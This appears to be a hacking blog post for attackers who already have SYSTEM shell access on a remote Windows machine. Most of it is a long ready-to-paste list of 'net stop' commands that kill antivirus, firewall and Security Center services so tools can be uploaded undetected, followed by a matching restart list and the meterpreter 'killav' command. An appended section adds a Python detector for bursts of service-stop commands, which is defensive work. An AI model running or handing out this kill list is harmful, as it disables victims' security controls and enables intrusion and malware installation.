So you’ve got shell access to a remote box as SYSTEM and you want to upload some tools but you keep getting halted by antivirus and the like.
Here’s a quick list of services to kill:
net stop "Ahnlab Task Scheduler"
net stop "altiris client service"
net stop ANTIVIR
net stop ATRACK
net stop "avast! antivirus"
net stop "avast! iavs4 control service"
net stop AVCONSOL
net stop "AVG6 Service"
net stop "AVG7 Alert Manager Server"
net stop "AVG7 Update Service"
net stop AVP32
net stop "AVP control center service"
net stop AVP.EXE
net stop "AVSync Manager"
net stop AVSYNMGR
net stop "Background Intelligent Transfer Service"
net stop "BlackICE"
net stop "carbon copy access edition"
net stop CFINET
net stop CFINET32
net stop "config loader"
net stop "DefWatch"
net stop "Detector de OfficeScanNT"
net stop "directupdate engine"
net stop "dllhost"
net stop "dns"
net stop "etrust antivirus job server"
net stop "eTrust Antivirus Job Server"
net stop "etrust antivirus realtime server"
net stop "eTrust Antivirus Realtime Server"
net stop "etrust antivirus rpc server"
net stop "eTrust Antivirus RPC Server"
net stop "Eventask"
net stop "FireBall"
net stop "FireBaum"
net stop "fix-it task manager"
net stop F-PROT95
net stop FP-WIN
net stop F-STOPW
net stop "fxsvc"
net stop "gear security"
net stop IAMAPP
net stop ICMON
net stop "intel file transfer"
net stop "intel pds"
net stop "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
net stop "InternetFirewallProc"
net stop "internet pr0tocol"
net stop IOMON98
net stop "iroff"
net stop "KAV Moniter Service"
net stop "kerio personal firewall"
net stop "Kingsoft AntiVirus Service"
net stop LOCKDOWN2000
net stop LUALL
net stop LUCOMSERVER
net stop "MastDLL"
net stop MCAFEE
net stop "McAfee Agent"
net stop "McAfee.com McShield"
net stop "McAfee.com VirusScan Online Realtime Engine"
net stop "mcafee framework service"
net stop "mcshield"
net stop "McShield"
net stop "MonSvcNT"
net stop msclol2
net stop "msclol2"
net stop msclol8
net stop "msclol8"
net stop msinit
net stop "MsInt"
net stop "MsIntScan"
net stop "NAV Alert"
net stop NAVAPSVC
net stop NAVAPW32
net stop "NAV Auto-Protect"
net stop NAVLU32
net stop NAVRUNR
net stop NAVW32
net stop NAVWNT
net stop NISSERV
net stop NISUM
net stop NMAIN
net stop noipducservice
net stop NORTON
net stop "Norton AntiVirus Auto Protect Service"
net stop "Norton AntiVirus Client"
net stop "Norton AntiVirus Corporate Edition"
net stop "Norton AntiVirus Server"
net stop "Norton Internet Security Accounts Manager"
net stop "Norton Internet Security Proxy Srvice"
net stop "Norton Internet Security service"
net stop "Norton Unerase Protection"
net stop NVC95
net stop "nvscv"
net stop "officescannt listener"
net stop "OfficeScanNT Monitor"
net stop "officescannt realtime scan"
net stop "outpost firewall service"
net stop "P2P Networking"
net stop "Panda Antivirus"
net stop "pcanywhere host service"
net stop "PC-cillin Personal Firewall"
net stop PCCIOMON
net stop PCCMAIN
net stop PCCWIN98
net stop POP3TRAP
net stop psexesvc
net stop PVIEW95
net stop "Quick Heal Online Protection"
net stop "RemoteAgent"
net stop "remotely possible/32"
net stop RESCUE32
net stop "rising process communication center"
net stop "Rising Process Communication Center"
net stop "rising realtime monitor service"
net stop "Rising Realtime Monitor Service"
net stop "rundll"
net stop SAFEWEB
net stop "ScriptBlocking Service"
net stop "scvhost"
net stop "secur2
net stop "Security Center"
net stop "services32 service: msinit"
net stop "servu"
net stop "Serv-U"
net stop "serv-u-ftp"
net stop "smss"
net stop "snake sockproxy service"
net stop "Sophos Anti-Virus"
net stop "Sophos Anti-Virus Network"
net stop "Sygate Personal Firewall"
net stop "Sygate Personal Firewall Pro"
net stop "SyGateService"
net stop "symantec central quarantine"
net stop "Symantec Event Manager"
net stop "Symantec Proxy Service"
net stop "symantec quarantine agent"
net stop "symantec quarantine scanner"
net stop SYMPROXYSVC
net stop "syslock"
net stop "System Event Notification"
net stop "systemsecuritydll"
net stop "task manager"
net stop "Trend Micro Proxy Service"
net stop "Trend NT Realtime Service"
net stop "V3MonNT"
net stop "V3MonSvc"
net stop "ViRobot Expert Monitoring"
net stop "ViRobot Lite Monitoring"
net stop "ViRobot Professional Monitoring"
net stop "vnc server"
net stop "VNC server"
net stop VSHWIN32
net stop VSSTAT
net stop WEBSCANX
net stop WEBTRAP
net stop win32sl
net stop "Windows Firewall"
net stop "Windows Internet Connection Sharing(ICS)"
net stop "ZoneAlarm"
Use with caution, as it’s not as easy to start them all up again. Maybe this would help:
net start "Ahnlab Task Scheduler"
net start "altiris client service"
net start ANTIVIR
net start ATRACK
net start "avast! antivirus"
net start "avast! iavs4 control service"
net start AVCONSOL
net start "AVG6 Service"
net start "AVG7 Alert Manager Server"
net start "AVG7 Update Service"
net start AVP32
net start "AVP control center service"
net start AVP.EXE
net start "AVSync Manager"
net start AVSYNMGR
net start "Background Intelligent Transfer Service"
net start "BlackICE"
net start "carbon copy access edition"
net start CFINET
net start CFINET32
net start "config loader"
net start "DefWatch"
net start "Detector de OfficeScanNT"
net start "directupdate engine"
net start "dllhost"
net start "dns"
net start "etrust antivirus job server"
net start "eTrust Antivirus Job Server"
net start "etrust antivirus realtime server"
net start "eTrust Antivirus Realtime Server"
net start "etrust antivirus rpc server"
net start "eTrust Antivirus RPC Server"
net start "Eventask"
net start "FireBall"
net start "FireBaum"
net start "fix-it task manager"
net start F-PROT95
net start FP-WIN
net start F-STOPW
net start "fxsvc"
net start "gear security"
net start IAMAPP
net start ICMON
net start "intel file transfer"
net start "intel pds"
net start "Internet Connection Firewall (ICF) / Internet Connection Sharing (ICS)"
net start "InternetFirewallProc"
net start "internet pr0tocol"
net start IOMON98
net start "iroff"
net start "KAV Moniter Service"
net start "kerio personal firewall"
net start "Kingsoft AntiVirus Service"
net start LOCKDOWN2000
net start LUALL
net start LUCOMSERVER
net start "MastDLL"
net start MCAFEE
net start "McAfee Agent"
net start "McAfee.com McShield"
net start "McAfee.com VirusScan Online Realtime Engine"
net start "mcafee framework service"
net start "mcshield"
net start "McShield"
net start "MonSvcNT"
net start msclol2
net start "msclol2"
net start msclol8
net start "msclol8"
net start msinit
net start "MsInt"
net start "MsIntScan"
net start "NAV Alert"
net start NAVAPSVC
net start NAVAPW32
net start "NAV Auto-Protect"
net start NAVLU32
net start NAVRUNR
net start NAVW32
net start NAVWNT
net start NISSERV
net start NISUM
net start NMAIN
net start noipducservice
net start NORTON
net start "Norton AntiVirus Auto Protect Service"
net start "Norton AntiVirus Client"
net start "Norton AntiVirus Corporate Edition"
net start "Norton AntiVirus Server"
net start "Norton Internet Security Accounts Manager"
net start "Norton Internet Security Proxy Srvice"
net start "Norton Internet Security service"
net start "Norton Unerase Protection"
net start NVC95
net start "nvscv"
net start "officescannt listener"
net start "OfficeScanNT Monitor"
net start "officescannt realtime scan"
net start "outpost firewall service"
net start "P2P Networking"
net start "Panda Antivirus"
net start "pcanywhere host service"
net start "PC-cillin Personal Firewall"
net start PCCIOMON
net start PCCMAIN
net start PCCWIN98
net start POP3TRAP
net start psexesvc
net start PVIEW95
net start "Quick Heal Online Protection"
net start "RemoteAgent"
net start "remotely possible/32"
net start RESCUE32
net start "rising process communication center"
net start "Rising Process Communication Center"
net start "rising realtime monitor service"
net start "Rising Realtime Monitor Service"
net start "rundll"
net start SAFEWEB
net start "ScriptBlocking Service"
net start "scvhost"
net start "secur2
net start "Security Center"
net start "services32 service: msinit"
net start "servu"
net start "Serv-U"
net start "serv-u-ftp"
net start "smss"
net start "snake sockproxy service"
net start "Sophos Anti-Virus"
net start "Sophos Anti-Virus Network"
net start "Sygate Personal Firewall"
net start "Sygate Personal Firewall Pro"
net start "SyGateService"
net start "symantec central quarantine"
net start "Symantec Event Manager"
net start "Symantec Proxy Service"
net start "symantec quarantine agent"
net start "symantec quarantine scanner"
net start SYMPROXYSVC
net start "syslock"
net start "System Event Notification"
net start "systemsecuritydll"
net start "task manager"
net start "Trend Micro Proxy Service"
net start "Trend NT Realtime Service"
net start "V3MonNT"
net start "V3MonSvc"
net start "ViRobot Expert Monitoring"
net start "ViRobot Lite Monitoring"
net start "ViRobot Professional Monitoring"
net start "vnc server"
net start "VNC server"
net start VSHWIN32
net start VSSTAT
net start WEBSCANX
net start WEBTRAP
net start win32sl
net start "Windows Firewall"
net start "Windows Internet Connection Sharing(ICS)"
net start "ZoneAlarm"
Or the easy way, should you have a meterpreter session on the remote box:
meterpreter > run killav
[*] Killing Antivirus services on the target...
meterpreter >
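On the monitoring side, a list like the one above leaves a very recognisable trace: many distinct service-stop commands on one host within seconds. The following is an added example, not part of the original post, that flags such bursts in process-creation records; the `timestamp|host|user|command line` record format, the sample records, and the threshold and window values are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches "net stop X", "net1 stop X" and "sc stop X"; captures the service name.
STOP_RE = re.compile(r'^\s*(?:net1?|sc)(?:\.exe)?\s+stop\s+"?([^"]+?)"?\s*$', re.I)

# Constructed sample records: timestamp|host|user|command line (assumed format).
SAMPLE_LOG = """\
2024-01-10T09:00:01|WS01|SYSTEM|net stop "McShield"
2024-01-10T09:00:01|WS01|SYSTEM|net stop "Sophos Anti-Virus"
2024-01-10T09:00:02|WS01|SYSTEM|net stop "Windows Firewall"
2024-01-10T09:00:02|WS01|SYSTEM|net stop "Security Center"
2024-01-10T09:00:03|WS01|SYSTEM|net stop ZoneAlarm
2024-01-10T09:05:00|WS02|admin|net stop "Print Spooler"
2024-01-10T09:05:30|WS02|admin|net start "Print Spooler"
2024-01-10T11:00:00|WS02|admin|sc stop wuauserv
"""

def parse(log_text):
    """Yield (time, host, user, service) for every service-stop command."""
    for line in log_text.splitlines():
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # skip malformed records
        ts, host, user, cmd = parts
        m = STOP_RE.match(cmd)
        if m:
            yield datetime.fromisoformat(ts), host, user, m.group(1).strip().lower()

def find_bursts(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {host: services} where >= threshold distinct services were stopped within window."""
    per_host = defaultdict(list)
    for ts, host, _user, svc in parse(log_text):
        per_host[host].append((ts, svc))
    alerts = {}
    for host, events in per_host.items():
        events.sort()
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it spans at most `window`.
            while events[end][0] - events[start][0] > window:
                start += 1
            distinct = {svc for _, svc in events[start:end + 1]}
            if len(distinct) >= threshold:
                alerts[host] = sorted(distinct)
                break
    return alerts

if __name__ == "__main__":
    print(find_bursts(SAMPLE_LOG))
```

An administrator restarting a single service (WS02 in the sample) stays below the threshold, while the scripted run on WS01 is reported with the list of services it touched.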